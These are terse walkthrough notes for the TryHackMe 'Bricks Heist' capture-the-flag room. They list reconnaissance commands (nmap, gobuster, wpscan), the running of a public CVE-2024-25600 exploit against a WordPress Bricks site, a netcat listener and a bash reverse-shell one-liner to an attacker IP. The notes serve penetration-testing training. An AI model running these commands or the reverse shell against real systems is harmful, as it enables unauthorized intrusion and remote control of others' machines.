TryHack3M: Bricks Heist
Add hostname to host file
echo $VICTIM bricks.thm >> /etc/hosts
cat /etc/hosts
Scans
Initial scan
Kali
nmap -A $VICTIM


Longer scan
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP
Kali
gobuster dir -u http://bricks.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
TCP/443 - HTTPS
Kali
gobuster dir -k -u https://bricks.thm -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali
wpscan --url https://bricks.thm/ --disable-tls-checks

Kali
git clone https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT.git
cd CVE-2024-25600-EXPLOIT/
python CVE-2024-25600.py -u https://bricks.thm/

Initial Shell
Kali
nc -lvnp 1337
Kali(Shell)
bash -c 'exec bash -i >& /dev/tcp/10.10.181.161/1337 0>&1'

Victim
systemctl list-units --type=service --state=running

Victim
systemctl cat ubuntu.service

Last updated